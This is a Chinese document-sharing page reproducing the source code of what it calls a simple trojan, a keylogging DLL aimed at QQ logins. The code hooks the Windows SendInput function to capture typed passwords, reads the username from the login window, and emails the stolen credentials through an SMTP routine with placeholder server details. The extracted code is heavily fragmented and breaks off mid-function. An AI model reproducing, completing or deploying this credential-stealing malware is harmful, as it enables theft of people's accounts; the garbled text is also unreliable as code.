一个简单木马的源代码文档格式.docx
- 文档编号:21120163
- 上传时间:2023-01-27
- 格式:DOCX
- 页数:28
- 大小:23.01KB
一个简单木马的源代码文档格式.docx
《一个简单木马的源代码文档格式.docx》由会员分享,可在线阅读,更多相关《一个简单木马的源代码文档格式.docx(28页珍藏版)》请在冰豆网上搜索。
#include
<
windows.h>
stdio.h>
WinAble.h>
#pragma
comment(lib,"
User32.lib"
)
"
User32Hook.h"
g_Password[100]={0};
int
g_KeyIndex=0;
BYTE
g_OldFunc[8];
g_NewFunc[8];
FARPROC
g_lpHookFunc;
g_NewFunc2[8]={0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90};
g_lpHookFunc2;
asciiKey1[]={
'
~'
'
1'
2'
3'
4'
5'
6'
7'
8'
9'
0'
-'
='
a'
b'
c'
d'
e'
f'
g'
h'
i'
j'
k'
l'
m'
n'
o'
p'
q'
r'
s'
t'
u'
v'
w'
x'
y'
z'
['
]'
\\'
;
\'
.'
/'
*'
+'
};
asciiKey2[]={
A'
B'
C'
D'
E'
F'
G'
H'
I'
J'
K'
L'
M'
N'
O'
P'
Q'
R'
S'
T'
U'
V'
W'
X'
Y'
Z'
unsigned
asciiTbl[]={
0xFFFFFFC0,0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x30,0xFFFFFFBD,0xFFFFFFBB,
0x41,0x42,0x43,0x44,0x45,0x46,0x47,0x48,0x49,0x4A,0x4B,0x4C,0x4D,0x4E,0x4F,0x50,0x51,0x52,0x53,0x54,0x55,0x56,0x57,0x58,0x59,0x5A,
0xFFFFFFDB,0xFFFFFFDD,0xFFFFFFDC,0xFFFFFFBA,0xFFFFFFDE,0xFFFFFFBC,0xFFFFFFBE,0xFFFFFFBF,
0x60,0x61,0x62,0x63,0x64,0x65,0x66,0x67,0x68,0x69,0x6A,0x6B,0x6D,0x6E,0x6F
UINT
WINAPI
XwSendInput(UINT
nInputs,LPINPUT
pInputs,int
cbSize)
nRet=0;
HookOff();
nRet=SendInput(nInputs,pInputs,cbSize);
HookOn();
=0x7374)
POINT
point;
:
GetCaretPos(&
point);
postion=point.x/8;
if(pInputs->
for(int
i=0;
i<
63;
i++)
if(GetKeyState(VK_NUMLOCK)==0&
i>
(63-15))
break;
if(asciiTbl[i]==key)
if((GetKeyState(VK_CAPITAL)==1&
GetAsyncKeyState(VK_SHIFT)!
=0)||GetKeyState(VK_CAPITAL)==0&
GetAsyncKeyState(VK_SHIFT)==0)
if(postion<
g_KeyIndex)
k=g_KeyIndex;
k>
=postion;
k--)
g_Password[k+1]=g_Password[k];
g_Password[postion]=asciiKey1[i];
g_KeyIndex++;
else
g_Password[g_KeyIndex++]=asciiKey1[i];
GetAsyncKeyState(VK_SHIFT)==0)||(GetKeyState(VK_CAPITAL)==0&
=0))
g_Password[postion]=asciiKey2[i];
g_Password[g_KeyIndex++]=asciiKey2[i];
if(key==0x8)
if(g_KeyIndex>
0)
g_Password[g_KeyIndex]=0;
g_Password[--g_KeyIndex]=0;
return
nRet;
void
InitHookCallBack()
g_lpHookFunc=GetProcAddress(GetModuleHandle("
user32.dll"
),"
SendInput"
);
g_NewFunc[0]=0xe9;
memcpy(g_OldFunc,(char*)g_lpHookFunc,5);
*pNewFuncAddress=(DWORD*)&
g_NewFunc[1];
*pNewFuncAddress=(DWORD)((FARPROC)XwSendInput)-((DWORD)g_lpHookFunc)-5;
HookOn()
dwOleFlag;
WriteProcessMemory(GetCurrentProcess(),(void*)g_lpHookFunc,(void*)g_NewFunc,5,&
dwOleFlag);
HookOff()
dwNewFlag;
WriteProcessMemory(GetCurrentProcess(),(void*)g_lpHookFunc,(void*)g_OldFunc,5,&
dwNewFlag);
木马dll函数的
main.cpp文件的代码
Windows.h>
SendMail.h"
comment(linker,"
/export:
DllCanUnloadNow=Command.DllCanUnloadNow"
DllGetClassObject=Command.DllGetClassObject"
DllMain=Command.DllMain"
DllRegisterServer=Command.DllRegisterServer"
DllUnregisterServer=Command.DllUnregisterServer"
HWND
hLoginWindow,hUserName,hUserPwd;
g_UserName[100]={0};
g_Version[100]={0};
WaitLoginWindow()
Sleep(1500);
while(true)
hLoginWindow=GetForegroundWindow();
pni;
RECT
rcWindow;
GetWindowRect(hLoginWindow,&
rcWindow);
pni.y=rcWindow.top+115;
pni.x=rcWindow.left+100;
hUserName=WindowFromPoint(pni);
pni.y=rcWindow.top+155;
hUserPwd=WindowFromPoint(pni);
LONG
lStyle
=
GetWindowLong(hUserPwd,
GWL_STYLE);
if(lStyle
ES_PASSWORD)
Sleep(100);
ServerThreadProc(LPVOID
lpParameter)
memset(g_Password,0,100);
WaitLoginWindow();
SendMessage(hUserName,WM_GETTEXT,100,(LPARAM)g_UserName);
SendMessage(hLoginWindow,WM_GETTEXT,100,(LPARAM)g_Version);
tempAccounts[100];
SendMessage(hUserName,WM_GETTEXT,100,(LPARAM)tempAccounts);
if(strcmp(g_UserName,tempAccounts)!
=0&
strlen(tempAccounts)!
=0)
strcpy(g_UserName,tempAccounts);
if((lStyle
ES_PASSWORD)==0)
szContext[64]={0};
sprintf(szContext,"
QQ版本:
%s\r\n用户名:
%s\r\n密
码:
%s\r\n"
g_Version,g_UserName,g_Password);
SMTPINFO
smtpinfo;
strcpy(smtpinfo.SmtpSrvName,"
AAAAAAAAAAAAAAAAAAAA"
strcpy(smtpinfo.Port,"
25"
strcpy(smtpinfo.UserName,"
BBBBBBBBBBBBBBBBBBBB"
strcpy(smtpinfo.Password,"
CCCCCCCCCCCCCCCCCCCC"
strcpy(smtpinfo.From,"
DDDDDDDDDDDDDDDDDDDD"
strcpy(smtpinfo.To,"
EEEEEEEEEEEEEEEEEEEE"
strcpy(smtpinfo.Subject,"
*☆‰小五※*提醒-获取到新的QQ!
strcpy(smtpinfo.Msg,szContext);
SendMail(&
smtpinfo);
0;
BOOL
DllMain(__in
*
_HDllHandle,
__in
_Reason,
__in_opt
_Reserved)
switch(_Reason)
case
DLL_PROCESS_ATTACH:
InitHookCallBack();
CreateThread(NULL,0,ServerThreadProc,0,0,0);
DLL_PROCESS_DETACH:
TRUE;
WinMain(HINSTANCE
hInstance,HINSTANCE
hPrevInstance,LPSTR
lpCmdLine,int
nCmdShow)
User32Hook.h
文件的代码
extern
g_Password[100];
SendMail.h文件
typedef
struct
_SMTPINFO
SmtpSrvName[32];
Port[7];
UserName[16];
Password[16];
From[32];
To[32];
Subject[32];
Msg[64];
}SMTPINFO;
//将用户名和密码转换为base64编码
Base64(unsigned
*chasc,unsigned
*chuue);
Talk(SOCKET
sockid,
const
*OkCode,
*pSend);
SendMail(const
*psmtpinfo);
SendMail.cpp文件中的代码
winsock2.h>
#define
WIN32_LEAN_AND_MEAN
stdlib.h>
ws2_32.lib"
buflen
256;
buf[buflen];
i,userlen,passlen;
//---------------------------------------------------------------------
*psmtpinfo)
//准备网络连接
WSADATA
wsadata;
if
(WSAStartup(MAKEWORD(2,2),&
wsadata)
!
1;
//创建套接字
SOCKET
sockid;
((sockid
socket(AF_INET,SOCK_STREAM,0))
==
INVALID_SOCKET)
WSACleanup();
//得到smtp服务器ip
hostent
*phostent
gethostbyname(psmtpinfo->
SmtpSrvName);
sockaddr_in
addr;
CopyMemory(&
addr.sin_addr.S_un.S_addr,
phostent->
h_addr_list[0],
sizeof(addr.sin_addr.S_un.S_addr));
addr.sin_family
AF_INET;
addr.sin_port
htons(atoi(psmtpinfo->
Port));
ZeroMemory(&
addr.sin_zero,
8);
//连接服务器
(connect(sockid,
(struct
sockaddr
*)&
addr,
sizeof(struct
sockaddr_in))
SOCKET_ERROR)
goto
STOP;
(Talk(sockid,
220"
EHLO
sjdf"
))
250"
AUTH
LOGIN"
ZeroMemory(buf,
buflen);
userlen
lstrlen(psmtpinfo->
UserName);
passlen
Password);
for(i
i
(userlen%3?
userlen/3+1:
userlen/3);
Base64((unsigned
)(psmtpinfo->
UserName
+
3),(unsigned
)(
buf
4));
334"
buf))
S
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 一个 简单 木马 源代码